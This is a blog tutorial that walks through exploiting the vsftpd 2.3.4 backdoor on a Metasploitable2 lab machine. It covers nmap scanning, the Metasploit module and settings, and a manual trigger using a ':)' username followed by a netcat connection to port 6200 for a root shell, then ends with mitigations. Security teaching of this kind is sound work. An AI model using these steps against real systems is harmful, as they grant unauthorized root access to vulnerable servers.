DEV Community

Soumya Ranjan πŸŽ–οΈ
Soumya Ranjan πŸŽ–οΈ

Posted on

Metasploitable2 - FTP Exploitation using vsftpd 2.3.4 Backdoor

#cybersecurity #infosec #security #tutorial

Metasploitable2 - FTP Exploitation using vsftpd 2.3.4 Backdoor

1. Objective

To identify and exploit a known vulnerability in an FTP service running on a vulnerable target machine using industry-standard reconnaissance and exploitation techniques.

2. Lab Environment

Component Description
Attacker Machine Kali Linux
Target Machine Metasploitable2
Network Type Host-only / NAT (same subnet)

3. Tools & Technologies Used

  • #Nmap – Network discovery and service enumeration
  • #Netcat – Banner grabbing and manual interaction
  • #Metasploit Framework – Exploitation
  • #Exploit_Database – Exploit reference

4. Methodology

Step 1: Identify Attacker Machine IP

ip a

  • Extract the IP address of the Kali machine (e.g., 192.168.1.159)

Step 2: Network Discovery


nmap -sn 192.168.1.0/24

  • Performs a ping scan to identify active hosts
  • Target identified: 192.168.1.160 β†’ Metasploitable2

Step 3: Service Enumeration


nmap -sV 192.168.1.160

![[Pasted image 20260418144903.png]]

  • Detects running services and versions
  • Key finding: FTP β†’ vsftpd 2.3.4

Step 4: Targeted Port Scan (FTP)


nmap -p 21 -sV 192.168.1.160

  • Confirms FTP service version

Step 5: #Banner_Grabbing (Manual Verification)

Using Netcat:


nc 192.168.1.160 21

![[Pasted image 20260418154605.png]]

  • Confirms: vsftpd 2.3.4

5. Vulnerability Identification

  • Software: vsftpd 2.3.4
  • Issue: Backdoor intentionally inserted in this version
  • Exploit Source: Exploit DB
  • Public exploit available:
    • Backdoor triggered via malicious username input

6. Exploitation using Metasploit

Step 1: Launch Framework


msfconsole

Step 2: Search for Exploit


search vsftpd

  • Relevant module: exploit/unix/ftp/vsftpd_234_backdoor ### Step 3: Load Exploit


use exploit/unix/ftp/vsftpd_234_backdoor

Step 4: Configure Target


set RHOST 192.168.1.160

Step 5: Configure listener

Shell
set LHOST <Your IP>

![[Pasted image 20260418152458.png]]

Step 5: Execute Exploit


run

Result

  • Remote shell access obtained
  • Privilege level: root

7. Manual Exploitation (Without Metasploit)

Step 1: Connect to FTP


ftp 192.168.1.160

Step 2: Trigger Backdoor

  • Username: test:)
  • Password: anything

Step 3: Connect to Backdoor Shell


nc 192.168.1.160 6200

Result

  • Direct root shell access established ## 8. Technical Explanation of the Vulnerability

The backdoor in vsftpd 2.3.4 operates as follows:

  • If the username contains :)
  • The service triggers a hidden function
  • Opens TCP port 6200
  • Provides unauthenticated root shell access

Attack Flow


Attacker β†’ FTP Login (malicious username)
β†’ Backdoor Triggered
β†’ Port 6200 Opened
β†’ Root Shell Access

9. Impact Analysis

Factor Impact
Confidentiality Fully compromised
Integrity Fully compromised
Availability Potentially disrupted
Access Level Root
  • Classified as Critical (CVSS ~10.0)

10. Mitigation & Remediation

  • Upgrade FTP service to a secure version
  • Avoid using outdated software
  • Implement network segmentation
  • Use IDS/IPS to detect abnormal behavior
  • Disable unnecessary services

Top comments (0)